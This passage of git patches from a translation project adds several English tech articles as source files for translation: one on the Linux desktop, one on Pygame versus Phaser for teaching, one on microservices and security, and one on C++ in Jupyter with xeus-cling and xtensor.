you're the little guy or gal; if you're working in open source, surely you should be proud of that. You're not going to alienate your customer—you're really not. + +1. **"Open" means choice, and I prefer a proprietary desktop, so I use that.**Being open certainly does mean you have a choice. You made that choice by working in open source. For many, including me, that's a moral and philosophical choice. Saying you embrace open source, but rejecting it in practice seems mealy mouthed, even insulting. Using openness to justify your choice is the wrong approach. Saying "I prefer a proprietary desktop, and company policy allows me to do so" is better. I don't agree with your decision, but at least you're not using the principle of openness to justify it. + +Is using open source easy? Not always. But it's getting easier. I think that we should stand up for what we believe in, and if you're reading [Opensource.com][14], then you probably believe in open source. And that, I believe, means that you should run Linux as your main desktop. + + _Note: I welcome comments, and would love to hear different points of view. I would ask that comments don't just list application X or application Y as not working on Linux. I concede that not all apps do. I'm more interested in justifications that I haven't covered above, or (perceived) flaws in my argument. Oh, and support for it, of course._ + + +### About the author + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/2017-05-10_0129.jpg?itok=Uh-eKFhx)][15] + + Mike Bursell - I've been in and around Open Source since around 1997, and have been running (GNU) Linux as my main desktop at home and work since then: [not always easy][7]...  I'm a security bod and architect, and am currently employed as Chief Security Architect for Red Hat.  I have a blog - "[Alice, Eve & Bob][8]" - where I write (sometimes rather parenthetically) about security.  I live in the UK and... [more about Mike Bursell][9][More about me][10] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/politics-linux-desktop + +作者:[Mike Bursell ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/mikecamel +[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[6]:https://opensource.com/article/17/11/politics-linux-desktop?rate=do69ixoNzK0yg3jzFk0bc6ZOBsIUcqTYv6FwqaVvzUA +[7]:https://opensource.com/article/17/11/politics-linux-desktop +[8]:https://aliceevebob.com/ +[9]:https://opensource.com/users/mikecamel +[10]:https://opensource.com/users/mikecamel +[11]:https://opensource.com/user/105961/feed +[12]:https://en.wikipedia.org/wiki/LILO_(boot_loader) +[13]:https://en.wikipedia.org/wiki/CrossOver_(software) +[14]:https://opensource.com/ +[15]:https://opensource.com/users/mikecamel +[16]:https://opensource.com/users/mikecamel +[17]:https://opensource.com/users/mikecamel +[18]:https://opensource.com/article/17/11/politics-linux-desktop#comments +[19]:https://opensource.com/tags/linux From 81b6d10b3bc957bde328d3586df23607c80d5258 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:07:28 +0800 Subject: [PATCH 0179/1627] =?UTF-8?q?20171203-15=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... a great pair for beginning programmers.md | 142 ++++++++++++++++++ 1 file changed, 142 insertions(+) create mode 100644 sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md diff --git a/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md b/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md new file mode 100644 index 0000000000..479bfb1232 --- /dev/null +++ b/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md @@ -0,0 +1,142 @@ +Why Python and Pygame are a great pair for beginning programmers +============================================================ + +### We look at three reasons Pygame is a good choice for learning to program. + + +![What's the best game platform for beginning programmers?](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/code_development_programming.png?itok=M_QDcgz5 "What's the best game platform for beginning programmers?") +Image by :  + +opensource.com + +Last month, [Scott Nesbitt][10] wrote about [Mozilla awarding $500K to support open source projects][11]. Phaser, a HTML/JavaScript game platform, was [awarded $50,000][12]. I’ve been teaching Phaser to my pre-teen daughter for a year, and it's one of the best and easiest HTML game development platforms to learn. [Pygame][13], however, may be a better choice for beginners. Here's why. + +### 1\. One long block of code + +Pygame is based on Python, the [most popular language for introductory computer courses][14]. Python is great for writing out ideas in one long block of code. Kids start off with a single file and with a single block of code. Before they can get to functions or classes, they start with code that will soon resemble spaghetti. It’s like finger-painting, as they throw thoughts onto the page. + +More Python Resources + +* [What is Python?][1] + +* [Top Python IDEs][2] + +* [Top Python GUI frameworks][3] + +* [Latest Python content][4] + +* [More developer resources][5] + +This approach to learning works. Kids will naturally start to break things into functions and classes as their code gets more difficult to manage. By learning the syntax of a language like Python prior to learning about functions, the student will gain basic programming knowledge before using global and local scope. + +Most HTML games separate the structure, style, and programming logic into HTML, CSS, and JavaScript to some degree and require knowledge of CSS and HTML. While the separation is better in the long term, it can be a barrier for beginners. Once kids realize that they can quickly build web pages with HTML and CSS, they may get distracted by the visual excitement of colors, fonts, and graphics. Even those who stay focused on JavaScript coding will still need to learn the basic document structure that the JavaScript code sits in. + +### 2\. Global variables are more obvious + +Both Python and JavaScript use dynamically typed variables, meaning that a variable becomes a string, an integer, or float when it’s assigned; however, making mistakes is easier in JavaScript. Similar to typed variables, both JavaScript and Python have global and local variable scopes. In Python, global variables inside of a function are identified with the global keyword. + +Let’s look at the basic [Making your first Phaser game tutorial][15], by Alvin Ourrad and Richard Davey, to understand the challenge of using Phaser to teach programming to beginners. In JavaScript, global variables—variables that can be accessed anywhere in the program—are difficult to keep track of and often are the source of bugs that are challenging to solve. Richard and Alvin are expert programmers and use global variables intentionally to keep things concise. + +``` +var game = new Phaser.Game(800, 600, Phaser.AUTO, '', { preload: preload, create: create, update: update }); + +function preload() { + +    game.load.image('sky', 'assets/sky.png'); + +} + +var player; +var platforms; + +function create() { +    game.physics.startSystem(Phaser.Physics.ARCADE); +… +``` + +In their Phaser programming book  [_Interphase_ ,][16] Richard Davey and Ilija Melentijevic explain that global variables are commonly used in many Phaser projects because they make it easier to get things done quickly. + +> “If you’ve ever worked on a game of any significant size then this approach is probably already making you cringe slightly... So why do we do it? The reason is simply because it’s the most concise and least complicated way to demonstrate what Phaser can do.” + +Although structuring a Phaser application to use local variables and split things up nicely into separation of concerns is possible, that’s tough for kids to understand when they’re first learning to program. + +If you’re set on teaching your kids to code with JavaScript, or if they already know how to code in another language like Python, a good Phaser course is [The Complete Mobile Game Development Course][17], by [Pablo Farias Navarro][18]. Although the title focuses on mobile games, the actual course focuses on JavaScript and Phaser. The JavaScript and Phaser apps are moved to a mobile phone with [PhoneGap][19]. + +### 3\. Pygame comes with less assembly required + +Thanks to [Python Wheels][20], Pygame is now super [easy to install][21]. You can also install it on Fedora/Red Hat with the **yum** package manager: + +``` +sudo yum install python3-pygame +``` + +See the official [Pygame installation documentation][22] for more information. + +Although Phaser itself is even easier to install, it does require more knowledge to use. As mentioned previously, the student will need to assemble their JavaScript code within an HTML document with some CSS. In addition to the three languages—HTML, CSS, and JavaScript—Phaser also requires the use of Firefox or Chrome development tools and an editor. The most common editors for JavaScript are Sublime, Atom, VS Code (probably in that order). + +Phaser applications will not run if you open the HTML file in a browser directly, due to [same-origin policy][23]. You must run a web server and access the files by connecting to the web server. Fortunately, you don’t need to run Apache on your local computer; you can run something lightweight like [httpster][24] for most projects. + +### Advantages of Phaser and JavaScript + +With all the challenges of JavaScript and Phaser, why am I teaching them? Honestly, I held off for a long time. I worried about students learning variable hoisting and scope. I developed my own curriculum based on Pygame and Python, then I developed one based on Phaser. Eventually, I decided to use Pablo’s pre-made curriculum as a starting point.  + +There are really two reasons that I moved to JavaScript. First, JavaScript has emerged as a serious language used in serious applications. In addition to web applications, it’s used for mobile and server applications. JavaScript is everywhere, and it’s used widely in applications kids see every day. If their friends code in JavaScript, they'll likely want to as well. As I saw the momentum behind JavaScript, I looked into alternatives that could compile into JavaScript, primarily Dart and TypeScript. I didn’t mind the extra conversion step, but I still looked at JavaScript. + +In the end, I chose to use Phaser and JavaScript because I realized that the problems could be solved with JavaScript and a bit of work. High-quality debugging tools and the work of some exceptionally smart people have made JavaScript a language that is both accessible and useful for teaching kids to code. + +### Final word: Python vs. JavaScript + +When people ask me what language to start their kids with, I immediately suggest Python and Pygame. There are tons of great curriculum options, many of which are free. I used ["Making Games with Python & Pygame"][25] by Al Sweigart with my son. I also used  _[Think Python: How to Think Like a Computer Scientist][7]_ by Allen B. Downey. You can get Pygame on your Android phone with [RAPT Pygame][26] by [Tom Rothamel][27]. + +Despite my recommendation, I always suspect that kids soon move to JavaScript. And that’s okay—JavaScript is a mature language with great tools. They’ll have fun with JavaScript and learn a lot. But after years of helping my daughter’s older brother create cool games in Python, I’ll always have an emotional attachment to Python and Pygame. + +### About the author + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/craig-head-crop.png?itok=LlMnIq8m)][28] + + Craig Oda - First elected president and co-founder of Tokyo Linux Users Group. Co-author of "Linux Japanese Environment" book published by O'Reilly Japan. Part of core team that established first ISP in Asia. Former VP of product management and product marketing for major Linux company. Partner at Oppkey, developer relations consulting firm in Silicon Valley.[More about me][8] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/pygame + +作者:[Craig Oda ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/codetricity +[1]:https://opensource.com/resources/python?intcmp=7016000000127cYAAQ +[2]:https://opensource.com/resources/python/ides?intcmp=7016000000127cYAAQ +[3]:https://opensource.com/resources/python/gui-frameworks?intcmp=7016000000127cYAAQ +[4]:https://opensource.com/tags/python?intcmp=7016000000127cYAAQ +[5]:https://developers.redhat.com/?intcmp=7016000000127cYAAQ +[6]:https://opensource.com/article/17/11/pygame?rate=PV7Af00S0QwicZT2iv8xSjJrmJPdpfK1Kcm7LXxl_Xc +[7]:http://greenteapress.com/thinkpython/html/index.html +[8]:https://opensource.com/users/codetricity +[9]:https://opensource.com/user/46031/feed +[10]:https://opensource.com/users/scottnesbitt +[11]:https://opensource.com/article/17/10/news-october-14 +[12]:https://www.patreon.com/photonstorm/posts +[13]:https://www.pygame.org/news +[14]:https://cacm.acm.org/blogs/blog-cacm/176450-python-is-now-the-most-popular-introductory-teaching-language-at-top-u-s-universities/fulltext +[15]:http://phaser.io/tutorials/making-your-first-phaser-game +[16]:https://phaser.io/interphase +[17]:https://academy.zenva.com/product/the-complete-mobile-game-development-course-platinum-edition/ +[18]:https://gamedevacademy.org/author/fariazz/ +[19]:https://phonegap.com/ +[20]:https://pythonwheels.com/ +[21]:https://pypi.python.org/pypi/Pygame +[22]:http://www.pygame.org/wiki/GettingStarted#Pygame%20Installation +[23]:https://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html +[24]:https://simbco.github.io/httpster/ +[25]:https://inventwithpython.com/makinggames.pdf +[26]:https://github.com/renpytom/rapt-pygame-example +[27]:https://github.com/renpytom +[28]:https://opensource.com/users/codetricity +[29]:https://opensource.com/users/codetricity +[30]:https://opensource.com/users/codetricity +[31]:https://opensource.com/article/17/11/pygame#comments +[32]:https://opensource.com/tags/python +[33]:https://opensource.com/tags/programming From 50a3d89c6ba7635e97982aac126395fa76347a43 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:10:14 +0800 Subject: [PATCH 0180/1627] =?UTF-8?q?20171203-16=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Why microservices are a security issue.md | 116 ++++++++++++++++++ 1 file changed, 116 insertions(+) create mode 100644 sources/tech/20171123 Why microservices are a security issue.md diff --git a/sources/tech/20171123 Why microservices are a security issue.md b/sources/tech/20171123 Why microservices are a security issue.md new file mode 100644 index 0000000000..d5868faa9e --- /dev/null +++ b/sources/tech/20171123 Why microservices are a security issue.md @@ -0,0 +1,116 @@ +Why microservices are a security issue +============================================================ + +### Maybe you don't want to decompose all your legacy applications into microservices, but you might consider starting with your security functions. + +![Why microservices are a security issue](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003601_05_mech_osyearbook2016_security_cc.png?itok=3V07Lpko "Why microservices are a security issue") +Image by : Opensource.com + +I struggled with writing the title for this post, and I worry that it comes across as clickbait. If you've come to read this because it looked like clickbait, then sorry.[1][5]I hope you'll stay anyway: there are lots of fascinating[2][6] points and many[3][7]footnotes. What I  _didn't_  mean to suggest is that microservices cause [security][15]problems—though like any component, of course, they can—but that microservices are appropriate objects of interest to those involved with security. I'd go further than that: I think they are an excellent architectural construct for those concerned with security. + +And why is that? Well, for those of us with a [systems security][16] bent, the world is an interesting place at the moment. We're seeing a growth in distributed systems, as bandwidth is cheap and latency low. Add to this the ease of deploying to the cloud, and more architects are beginning to realise that they can break up applications, not just into multiple layers, but also into multiple components within the layer. Load balancers, of course, help with this when the various components in a layer are performing the same job, but the ability to expose different services as small components has led to a growth in the design, implementation, and deployment of  _microservices_ . + +More on Microservices + +* [How to explain microservices to your CEO][1] + +* [Free eBook: Microservices vs. service-oriented architecture][2] + +* [Secured DevOps for microservices][3] + +So, [what exactly is a microservice][23]? I quite like [Wikipedia's definition][24], though it's interesting that security isn't mentioned there.[4][17] One of the points that I like about microservices is that, when well-designed, they conform to the first two points of Peter H. Salus' description of the [Unix philosophy][25]: + +1. Write programs that do one thing and do it well. + +2. Write programs to work together. + +3. Write programs to handle text streams, because that is a universal interface. + +The last of the three is slightly less relevant, because the Unix philosophy is generally used to refer to standalone applications, which often have a command instantiation. It does, however, encapsulate one of the basic requirements of microservices: that they must have well-defined interfaces. + +By "well-defined," I don't just mean a description of any externally accessible APIs' methods, but also of the normal operation of the microservice: inputs and outputs—and, if there are any, side-effects. As I described in a previous post, "[5 traits of good systems architecture][18]," data and entity descriptions are crucial if you're going to be able to design a system. Here, in our description of microservices, we get to see why these are so important, because, for me, the key defining feature of a microservices architecture is decomposability. And if you're going to decompose[5][8] your architecture, you need to be very, very clear which "bits" (components) are going to do what. + +And here's where security starts to come in. A clear description of what a particular component should be doing allows you to: + +* Check your design + +* Ensure that your implementation meets the description + +* Come up with reusable unit tests to check functionality + +* Track mistakes in implementation and correct them + +* Test for unexpected outcomes + +* Monitor for misbehaviour + +* Audit actual behaviour for future scrutiny + +Now, are all these things possible in a larger architecture? Yes, they are. But they become increasingly difficult where entities are chained together or combined in more complex configurations. Ensuring  _correct_  implementation and behaviour is much, much easier when you've got smaller pieces to work together. And deriving complex systems behaviours—and misbehaviours—is much more difficult if you can't be sure that the individual components are doing what they ought to be. + +It doesn't stop here, however. As I've mentioned on many [previous occasions][19], writing good security code is difficult.[7][9] Proving that it does what it should do is even more difficult. There is every reason, therefore, to restrict code that has particular security requirements—password checking, encryption, cryptographic key management, authorisation, etc.—to small, well-defined blocks. You can then do all the things that I've mentioned above to try to make sure it's done correctly. + +And yet there's more. We all know that not everybody is great at writing security-related code. By decomposing your architecture such that all security-sensitive code is restricted to well-defined components, you get the chance to put your best security people on that and restrict the danger that J. Random Coder[8][10] will put something in that bypasses or downgrades a key security control. + +It can also act as an opportunity for learning: It's always good to be able to point to a design/implementation/test/monitoring tuple and say: "That's how it should be done. Hear, read, mark, learn, and inwardly digest.[9][11]" + +Should you go about decomposing all of your legacy applications into microservices? Probably not. But given all the benefits you can accrue, you might consider starting with your security functions. + +* * * + +1Well, a little bit—it's always nice to have readers. + +2I know they are: I wrote them. + +3Probably less fascinating. + +4At the time this article was written. It's entirely possible that I—or one of you—may edit the article to change that. + +5This sounds like a gardening term, which is interesting. Not that I really like gardening, but still.[6][12] + +6Amusingly, I first wrote, "…if you're going to decompose your architect…," which sounds like the strapline for an IT-themed murder film. + +7Regular readers may remember a reference to the excellent film  _The Thick of It_ . + +8Other generic personae exist; please take your pick. + +9Not a cryptographic digest: I don't think that's what the original writers had in mind. + + _This article originally appeared on [Alice, Eve, and Bob—a security blog][13] and is republished with permission._ + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/microservices-are-security-issue + +作者:[Mike Bursell ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/mikecamel +[1]:https://blog.openshift.com/microservices-how-to-explain-them-to-your-ceo/?intcmp=7016000000127cYAAQ&src=microservices_resource_menu1 +[2]:https://www.openshift.com/promotions/microservices.html?intcmp=7016000000127cYAAQ&src=microservices_resource_menu2 +[3]:https://opensource.com/business/16/11/secured-devops-microservices?src=microservices_resource_menu3 +[4]:https://opensource.com/article/17/11/microservices-are-security-issue?rate=GDH4xOWsgYsVnWbjEIoAcT_92b8gum8XmgR6U0T04oM +[5]:https://opensource.com/article/17/11/microservices-are-security-issue#1 +[6]:https://opensource.com/article/17/11/microservices-are-security-issue#2 +[7]:https://opensource.com/article/17/11/microservices-are-security-issue#3 +[8]:https://opensource.com/article/17/11/microservices-are-security-issue#5 +[9]:https://opensource.com/article/17/11/microservices-are-security-issue#7 +[10]:https://opensource.com/article/17/11/microservices-are-security-issue#8 +[11]:https://opensource.com/article/17/11/microservices-are-security-issue#9 +[12]:https://opensource.com/article/17/11/microservices-are-security-issue#6 +[13]:https://aliceevebob.com/2017/10/31/why-microservices-are-a-security-issue/ +[14]:https://opensource.com/user/105961/feed +[15]:https://opensource.com/tags/security +[16]:https://aliceevebob.com/2017/03/14/systems-security-why-it-matters/ +[17]:https://opensource.com/article/17/11/microservices-are-security-issue#4 +[18]:https://opensource.com/article/17/10/systems-architect +[19]:https://opensource.com/users/mikecamel +[20]:https://opensource.com/users/mikecamel +[21]:https://opensource.com/users/mikecamel +[22]:https://opensource.com/article/17/11/microservices-are-security-issue#comments +[23]:https://opensource.com/resources/what-are-microservices +[24]:https://en.wikipedia.org/wiki/Microservices +[25]:https://en.wikipedia.org/wiki/Unix_philosophy From 31a4d191464506482bffafe09a17782a077ff78c Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:16:34 +0800 Subject: [PATCH 0181/1627] =?UTF-8?q?20171203-17=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...eractive Workflows for Cpp with Jupyter.md | 301 ++++++++++++++++++ 1 file changed, 301 insertions(+) create mode 100644 sources/tech/20171129 Interactive Workflows for Cpp with Jupyter.md diff --git a/sources/tech/20171129 Interactive Workflows for Cpp with Jupyter.md b/sources/tech/20171129 Interactive Workflows for Cpp with Jupyter.md new file mode 100644 index 0000000000..395c901618 --- /dev/null +++ b/sources/tech/20171129 Interactive Workflows for Cpp with Jupyter.md @@ -0,0 +1,301 @@ +Interactive Workflows for C++ with Jupyter +============================================================ + +Scientists, educators and engineers not only use programming languages to build software systems, but also in interactive workflows, using the tools available to  _explore _ a problem and  _reason _ about it. + +Running some code, looking at a visualization, loading data, and running more code. Quick iteration is especially important during the exploratory phase of a project. + +For this kind of workflow, users of the C++ programming language currently have no choice but to use a heterogeneous set of tools that don’t play well with each other, making the whole process cumbersome, and difficult to reproduce. + + _We currently lack a good story for interactive computing in C++_ . + +In our opinion, this hurts the productivity of C++ developers: + +* Most of the progress made in software projects comes from incrementalism. Obstacles to fast iteration hinder progress. + +* This also makes C++ more difficult to teach. The first hours of a C++ class are rarely rewarding as the students must learn how to set up a small project before writing any code. And then, a lot more time is required before their work can result in any visual outcome. + +### Project Jupyter and Interactive Computing + + + +![](https://cdn-images-1.medium.com/max/1200/1*wOHyKy6fl3ltcBMNpCvC6Q.png) + +The goal of Project Jupyter is to provide a consistent set of tools for scientific computing and data science workflows, from the exploratory phase of the analysis to the presentation and the sharing of the results. The Jupyter stack was designed to be agnostic of the programming language, and also to allow alternative implementations of any component of the layered architecture (back-ends for programming languages, custom renderers for file types associated with Jupyter). The stack consists of + +* a low-level specification for messaging protocols, standardized file formats, + +* a reference implementation of these standards, + +* applications built on the top of these libraries: the Notebook, JupyterLab, Binder, JupyterHub + +* and visualization libraries integrated into the Notebook and JupyterLab. + +Adoption of the Jupyter ecosystem has skyrocketed in the past years, with millions of users worldwide, over a million Jupyter notebooks shared on GitHub and large-scale deployments of Jupyter in universities, companies and high-performance computing centers. + +### Jupyter and C++ + +One of the main extension points of the Jupyter stack is the  _kernel_ , the part of the infrastructure responsible for executing the user’s code. Jupyter kernels exist for [numerous programming languages][14]. + +Most Jupyter kernels are implemented in the target programming language: the reference implementation [ipykernel][15] in Python, [IJulia][16] in Julia, leading to a duplication of effort for the implementation of the protocol. A common denominator to a lot of these interpreted languages is that the interpreter generally exposes a C API, allowing the embedding into a native application. In an effort to consolidate these commonalities and save work for future kernel builders, we developed  _xeus_ . + + + +![](https://cdn-images-1.medium.com/max/1200/1*TKrPv5AvFM3NJ6a7VMu8Tw.png) + +[Xeus ][17]is a C++ implementation of the Jupyter kernel protocol. It is not a kernel itself but a library that facilitates the authoring of kernels, and other applications making use of the Jupyter kernel protocol. + +A typical kernel implementation using xeus would in fact make use of the target interpreter _ as a library._ + +There are a number of benefits of using xeus over implementing your kernel in the target language: + +* Xeus provides a complete implementation of the protocol, enabling a lot of features from the start for kernel authors, who only need to deal with the language bindings. + +* Xeus-based kernels can very easily provide a back-end for Jupyter interactive widgets. + +* Finally, xeus can be used to implement kernels for domain-specific languages such as SQL flavors. Existing approaches use a Python wrapper. With xeus, the resulting kernel won't require Python at run-time, leading to large performance benefits. + + + +![](https://cdn-images-1.medium.com/max/1200/1*Cr_cfHdrgFXHlO15qdNK7w.png) + +Interpreted C++ is already a reality at CERN with the [Cling][18]C++ interpreter in the context of the [ROOT][19] data analysis environment. + +As a first example for a kernel based on xeus, we have implemented [xeus-cling][20], a pure C++ kernel. + + + +![](https://cdn-images-1.medium.com/max/1600/1*NnjISpzZtpy5TOurg0S89A.gif) +Redirection of outputs to the Jupyter front-end, with different styling in the front-end. + +Complex features of the C++ programming language such as, polymorphism, templates, lambdas, are supported by the cling interpreter, making the C++ Jupyter notebook a great prototyping and learning platform for the C++ users. See the image below for a demonstration: + + + +![](https://cdn-images-1.medium.com/max/1600/1*lGVLY4fL1ytMfT-eWtoXkw.gif) +Features of the C++ programming language supported by the cling interpreter + +Finally, xeus-cling supports live quick-help, fetching the content on [cppreference][21] in the case of the standard library. + + + +![](https://cdn-images-1.medium.com/max/1600/1*Igegq0xBebuJV8hy0TGpfg.png) +Live help for the C++standard library in the Jupyter notebook + +> We realized that we started using the C++ kernel ourselves very early in the development of the project. For quick experimentation, or reproducing bugs. No need to set up a project with a cpp file and complicated project settings for finding the dependencies… Just write some code and hit Shift+Enter. + +Visual output can also be displayed using the rich display mechanism of the Jupyter protocol. + + + +![](https://cdn-images-1.medium.com/max/1600/1*t_9qAXtdkSXr-0tO9VvOzQ.png) +Using Jupyter's rich display mechanism to display an image inline in the notebook + + +![](https://cdn-images-1.medium.com/max/1200/1*OVfmXFAbfjUtGFXYS9fKRA.png) + +Another important feature of the Jupyter ecosystem are the [Jupyter Interactive Widgets][22]. They allow the user to build graphical interfaces and interactive data visualization inline in the Jupyter notebook. Moreover it is not just a collection of widgets, but a framework that can be built upon, to create arbitrary visual components. Popular interactive widget libraries include + +* [bqplot][1] (2-D plotting with d3.js) + +* [pythreejs][2] (3-D scene visualization with three.js) + +* [ipyleaflet][3] (maps visualization with leaflet.js) + +* [ipyvolume][4] (3-D plotting and volume rendering with three.js) + +* [nglview][5] (molecular visualization) + +Just like the rest of the Jupyter ecosystem, Jupyter interactive widgets were designed as a language-agnostic framework. Other language back-ends can be created reusing the front-end component, which can be installed separately. + +[xwidgets][23], which is still at an early stage of development, is a native C++ implementation of the Jupyter widgets protocol. It already provides an implementation for most of the widget types available in the core Jupyter widgets package. + + + +![](https://cdn-images-1.medium.com/max/1600/1*ro5Ggdstnf0DoqhTUWGq3A.gif) +C++ back-end to the Jupyter interactive widgets + +Just like with ipywidgets, one can build upon xwidgets and implement C++ back-ends for the Jupyter widget libraries listed earlier, effectively enabling them for the C++ programming language and other xeus-based kernels: xplot, xvolume, xthreejs… + + + +![](https://cdn-images-1.medium.com/max/1200/1*yCRYoJFnbtxYkYMRc9AioA.png) + +[xplot][24] is an experimental C++ back-end for the [bqplot][25] 2-D plotting library. It enables an API following the constructs of the  [_Grammar of Graphics_][26]  in C++. + +In xplot, every item in a chart is a separate object that can be modified from the back-end,  _dynamically_ . + +Changing a property of a plot item, a scale, an axis or the figure canvas itself results in the communication of an update message to the front-end, which reflects the new state of the widget visually. + + + +![](https://cdn-images-1.medium.com/max/1600/1*Mx2g3JuTG1Cfvkkv0kqtLA.gif) +Changing the data of a scatter plot dynamically to update the chart + +> Warning: the xplot and xwidgets projects are still at an early stage of development and are changing drastically at each release. + +Interactive computing environments like Jupyter are not the only missing tool in the C++ world. Two key ingredients to the success of Python as the  _lingua franca_  of data science is the existence of libraries like [NumPy][27] and [Pandas][28] at the foundation of the ecosystem. + + + +![](https://cdn-images-1.medium.com/max/1200/1*HsU43Jzp1vJZpX2g8XPJsg.png) + +[xtensor][29] is a C++ library meant for numerical analysis with multi-dimensional array expressions. + +xtensor provides + +* an extensible expression system enabling lazy NumPy-style broadcasting. + +* an API following the  _idioms_  of the C++ standard library. + +* tools to manipulate array expressions and build upon xtensor. + +xtensor exposes an API similar to that of NumPy covering a growing portion of the functionalities. A cheat sheet can be [found in the documentation][30]: + + + +![](https://cdn-images-1.medium.com/max/1600/1*PBrf5vWYC8VTq_7VUOZCpA.gif) +Scrolling the NumPy to xtensor cheat sheet + +However, xtensor internals are very different from NumPy. Using modern C++ techniques (template expressions, closure semantics) xtensor is a lazily evaluated library, avoiding the creation of temporary variables and unnecessary memory allocations, even in the case complex expressions involving broadcasting and language bindings. + +Still, from a user perspective, the combination of xtensor with the C++ notebook provides an experience very similar to that of NumPy in a Python notebook. + + + +![](https://cdn-images-1.medium.com/max/1600/1*ULFpg-ePkdUbqqDLJ9VrDw.png) +Using the xtensor array expression library in a C++ notebook + +In addition to the core library, the xtensor ecosystem has a number of other components + +* [xtensor-blas][6]: the counterpart to the numpy.linalg module. + +* [xtensor-fftw][7]: bindings to the [fftw][8] library. + +* [xtensor-io][9]: APIs to read and write various file formats (images, audio, NumPy's NPZ format). + +* [xtensor-ros][10]: bindings for ROS, the robot operating system. + +* [xtensor-python][11]: bindings for the Python programming language, allowing the use of NumPy arrays in-place, using the NumPy C API and the pybind11 library. + +* [xtensor-julia][12]: bindings for the Julia programming language, allowing the use of Julia arrays in-place, using the C API of the Julia interpreter, and the CxxWrap library. + +* [xtensor-r][13]: bindings for the R programming language, allowing the use of R arrays in-place. + +Detailing further the features of the xtensor framework would be beyond the scope of this post. + +If you are interested in trying the various notebooks presented in this post, there is no need to install anything. You can just use  _binder_ : + +![](https://cdn-images-1.medium.com/max/1200/1*9cy5Mns_I0eScsmDBjvxDQ.png) + +[The Binder project][31], which is part of Project Jupyter, enables the deployment of containerized Jupyter notebooks, from a GitHub repository together with a manifest listing the dependencies (as conda packages). + +All the notebooks in the screenshots above can be run online, by just clicking on one of the following links: + +[xtensor][32]: the C++ N-D array expression library in a C++ notebook + +[xwidgets][33]: the C++ back-end for Jupyter interactive widgets + +[xplot][34]: the C++ back-end to the bqplot 2-D plotting library for Jupyter. + + + +![](https://cdn-images-1.medium.com/max/1200/1*JwqhpMxMJppEepj7U4fV-g.png) + +[JupyterHub][35] is the multi-user infrastructure underlying open wide deployments of Jupyter like Binder but also smaller deployments for authenticated users. + +The modular architecture of JupyterHub enables a great variety of scenarios on how users are authenticated, and what service is made available to them. JupyterHub deployment for several hundreds of users have been done in various universities and institutions, including the Paris-Sud University, where the C++ kernel was also installed for the students to use. + +> In September 2017, the 350 first-year students at Paris-Sud University who took the “[Info 111: Introduction to Computer +>  Science][36]” class wrote their first lines of C++ in a Jupyter notebook. + +The use of Jupyter notebooks in the context of teaching C++ proved especially useful for the first classes, where students can focus on the syntax of the language without distractions such as compiling and linking. + +### Acknowledgements + +The software presented in this post was built upon the work of a large number of people including the Jupyter team and the Cling developers. + +We are especially grateful to [Patrick Bos ][37](who authored xtensor-fftw), Nicolas Thiéry, Min Ragan Kelley, Thomas Kluyver, Yuvi Panda, Kyle Cranmer, Axel Naumann and Vassil Vassilev. + +We thank the [DIANA/HEP][38] organization for supporting travel to CERN and encouraging the collaboration between Project Jupyter and the ROOT team. + +We are also grateful to the team at Paris-Sud University who worked on the JupyterHub deployment and the class materials, notably [Viviane Pons][39]. + +The development of xeus, xtensor, xwidgets and related packages at [QuantStack][40] is sponsored by [Bloomberg][41]. + +### About the authors (alphabetical order) + + [_Sylvain Corlay_][42] _, _ Scientific Software Developer at [QuantStack][43] + + [_Loic Gouarin_][44] _, _ Research Engineer at [Laboratoire de Mathématiques at Orsay][45] + + [_Johan Mabille_][46] _, _ Scientific Software Developer at [QuantStack][47] + + [_Wolf Vollprecht_][48] , Scientific Software Developer at [QuantStack][49] + +Thanks to [Maarten Breddels][50], [Wolf Vollprecht][51], [Brian E. Granger][52], and [Patrick Bos][53]. + +-------------------------------------------------------------------------------- + +via: 